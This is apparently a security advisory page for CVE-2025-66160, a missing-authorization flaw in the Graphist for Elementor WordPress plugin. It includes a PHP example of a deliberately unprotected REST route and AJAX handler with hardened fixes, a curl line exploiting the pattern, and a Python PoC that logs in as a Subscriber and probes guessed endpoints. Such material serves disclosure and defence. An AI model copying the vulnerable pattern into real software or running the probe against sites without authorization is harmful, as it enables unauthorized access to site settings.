Security Vulnerability Report
CVE-2025-66160 CVSS 5.4 MEDIUM


Published: 2025-12-31 17:15:51
Last Modified: 2026-04-23 15:35:29

Description

Missing Authorization (CWE-862) vulnerability in merkulove's Graphist for Elementor WordPress plugin (listed by NVD and Patchstack under the doubled title "Select Graphist for Elementor Graphist for Elementor", slug graphist-elementor). Plugin functionality that should require an elevated capability can be invoked without an adequate authorization check, allowing exploitation of incorrectly configured access control security levels by an authenticated low-privilege user. This issue affects all versions from n/a through 1.2.10 (i.e. <= 1.2.10); the advisory does not name the specific unprotected function or endpoint.
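The bug class described above, shown as an added illustration rather than Graphist's own code: the plugin name, REST namespace, AJAX action, option key and capability below are invented. The first half registers a REST route and an admin-ajax handler that any authenticated Subscriber can call because no capability check is made (the UI being admin-only is not a control); the second half is the hardened form with a capability check at the route and a nonce plus capability check in the AJAX handler.

```php
<?php
/**
 * Added example of CWE-862 in a hypothetical Elementor add-on ("example-graph").
 * Not Graphist code; every name here is invented for illustration.
 */

// ---------- Vulnerable pattern ----------

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-graph/v1', '/settings', array(
        'methods'             => 'POST',
        'callback'            => 'example_graph_save_settings',
        // '__return_true' silences the core "missing permission_callback" notice
        // but grants access to every caller; a Subscriber with a REST nonce or an
        // Application Password can overwrite the plugin settings.
        'permission_callback' => '__return_true',
    ) );
} );

// Registered via wp_ajax_ only (no wp_ajax_nopriv_), so anonymous users are
// excluded, but "logged in" is not "authorized": there is no capability check
// and no nonce check.
add_action( 'wp_ajax_example_graph_save', 'example_graph_ajax_save_vulnerable' );
function example_graph_ajax_save_vulnerable() {
    $settings = isset( $_POST['settings'] ) ? (array) $_POST['settings'] : array();
    update_option( 'example_graph_settings', $settings );
    wp_send_json_success();
}

// ---------- Hardened pattern ----------

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-graph/v1', '/settings-secure', array(
        'methods'             => 'POST',
        'callback'            => 'example_graph_save_settings',
        // Authorization at the route: Subscribers receive 403 rest_forbidden.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args' => array(
            'settings' => array( 'type' => 'object', 'required' => true ),
        ),
    ) );
} );

add_action( 'wp_ajax_example_graph_save_secure', 'example_graph_ajax_save_secure' );
function example_graph_ajax_save_secure() {
    // CSRF: nonce minted with wp_create_nonce( 'example_graph_save' ) on the admin page.
    check_ajax_referer( 'example_graph_save', 'nonce' );
    // Authorization: the check whose absence is CWE-862.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    $settings = isset( $_POST['settings'] ) ? (array) $_POST['settings'] : array();
    update_option( 'example_graph_settings', example_graph_sanitize( $settings ) );
    wp_send_json_success();
}

// Shared callback; authorization has already been enforced by the route.
function example_graph_save_settings( WP_REST_Request $request ) {
    $settings = example_graph_sanitize( (array) $request->get_param( 'settings' ) );
    update_option( 'example_graph_settings', $settings );
    return rest_ensure_response( array( 'saved' => true ) );
}

// Allow-list the keys the plugin actually uses and sanitize each one.
function example_graph_sanitize( array $settings ) {
    return array(
        'chart_type' => sanitize_key( $settings['chart_type'] ?? 'bar' ),
        'api_key'    => sanitize_text_field( $settings['api_key'] ?? '' ),
    );
}
```

Against the vulnerable route, a Subscriber authenticated with an Application Password (`curl -u subscriber:app-password -X POST https://site.example/wp-json/example-graph/v1/settings`) gets a 200 and the option is overwritten; the hardened route returns 403 with `rest_forbidden`. Note that WordPress core (since 5.5) warns only when `permission_callback` is omitted entirely, not when it is set to `__return_true`, which is why that idiom survives code review so often; auditing a plugin for this CVE class means reading every `register_rest_route` and every `wp_ajax_*` handler for a `current_user_can()` call, not just grepping for the notice.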

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Vector decoded: network-reachable, low attack complexity, no user interaction, scope unchanged. PR:L means the attacker needs an authenticated account of any role (a Subscriber is enough, and sites with open registration hand those out on request), which is what keeps this at MEDIUM rather than HIGH. Impact is limited loss of confidentiality and integrity (C:L/I:L) with no availability impact, consistent with a low-privilege user being able to invoke plugin functionality that should require a higher capability.

Configurations (Affected Products)

NVD has published no CPE configuration data for this CVE (record status: Deferred). Per the description and the Patchstack advisory, the affected product is:

Graphist for Elementor (WordPress plugin, slug graphist-elementor) <= 1.2.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66160 PoC - Graphist Elementor Broken Access Control
# Affected: Graphist Elementor <= 1.2.10
# This PoC tries to reach plugin functionality that should be admin-only while
# authenticated as a low-privilege user (e.g. Subscriber).
#
# NOTE: the advisory does not name the unprotected function or endpoint. The
# paths in VULNERABLE_ENDPOINTS are guesses based on typical Elementor add-on
# plugin structure and must be replaced with the real routes of the target.

import sys
import requests

# Usage: python poc.py https://vulnerable-site.com subscriber_user 'password'
TARGET_URL = (sys.argv[1] if len(sys.argv) > 1 else "https://vulnerable-site.com").rstrip("/")
USERNAME = sys.argv[2] if len(sys.argv) > 2 else "subscriber_user"
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "password"

# Example endpoints that might be affected (hypothetical, see NOTE above)
VULNERABLE_ENDPOINTS = [
    "/wp-json/graphist/v1/settings",
    "/wp-admin/admin-ajax.php?action=graphist_get_data",
    "/wp-json/graphist/v1/graphs",
]


def login(session):
    """Authenticate the session as the low-privilege user via wp-login.php."""
    # wp-login.php sets wordpress_test_cookie on GET and refuses the POST unless
    # it comes back; the form fields are 'log' and 'pwd', not 'username'/'password'.
    session.get(f"{TARGET_URL}/wp-login.php", timeout=10)
    session.post(
        f"{TARGET_URL}/wp-login.php",
        data={"log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In",
              "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1"},
        timeout=10, allow_redirects=False,
    )
    if not any(name.startswith("wordpress_logged_in") for name in session.cookies.keys()):
        print("[!] Login failed - check credentials")
        return False
    # Cookie-authenticated REST requests are treated as anonymous unless they
    # carry an X-WP-Nonce header; core's 'rest-nonce' admin-ajax action hands one out.
    nonce = session.get(f"{TARGET_URL}/wp-admin/admin-ajax.php?action=rest-nonce",
                        timeout=10).text.strip()
    session.headers["X-WP-Nonce"] = nonce
    return True


def check_vulnerability():
    """
    Test if the Graphist Elementor plugin is vulnerable to CVE-2025-66160 by
    attempting to access privileged endpoints with a low-privilege user's session.
    """
    print("[*] Testing for CVE-2025-66160 - Missing Authorization in Graphist Elementor")
    print(f"[*] Target: {TARGET_URL}")

    session = requests.Session()
    if not login(session):
        return False

    for endpoint in VULNERABLE_ENDPOINTS:
        url = f"{TARGET_URL}{endpoint}"
        try:
            response = session.get(url, timeout=10)
        except requests.RequestException as e:
            print(f"[!] Error testing {url}: {e}")
            continue

        if response.status_code == 200:
            # Heuristic only: a 200 carrying plugin data for a Subscriber suggests
            # the capability check is missing. Confirm by diffing against an
            # Administrator session before reporting.
            if '"admin"' in response.text or '"settings"' in response.text:
                print(f"[+] VULNERABLE: {url} - Access granted without proper authorization")
                print(f"[+] Response preview: {response.text[:200]}...")
                return True
            print(f"[*] Endpoint: {url} - 200 but no recognisable plugin data")
        elif response.status_code in (401, 403):
            # WP REST answers 401 (rest_forbidden) when not logged in and 403 when
            # logged in but lacking the capability; admin-ajax answers 400 with body
            # "0" for an action that is not registered at all.
            print(f"[-] Protected: {url} - Access denied (status {response.status_code})")
        else:
            print(f"[*] Endpoint: {url} - Status: {response.status_code}")

    print("[*] Vulnerability check completed")
    return False


if __name__ == "__main__":
    check_vulnerability()

References

Patchstack advisory: https://patchstack.com/database/Wordpress/Plugin/graphist-elementor/vulnerability/wordpress-select-graphist-for-elementor-graphist-for-elementor-plugin-1-2-10-broken-access-control-vulnerability?_s_id=cve
Weakness: CWE-862 (Missing Authorization)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66160", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:50.783", "lastModified": "2026-04-23T15:35:29.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Select Graphist for Elementor\t Graphist for Elementor graphist-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Select Graphist for Elementor\t Graphist for Elementor: from n/a through <= 1.2.10."}, {"lang": "es", "value": "Vulnerabilidad de Autorización faltante en merkulove Select Graphist for Elementor Graphist for Elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Select Graphist for Elementor Graphist for Elementor: desde n/a hasta 1.2.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/graphist-elementor/vulnerability/wordpress-select-graphist-for-elementor-graphist-for-elementor-plugin-1-2-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}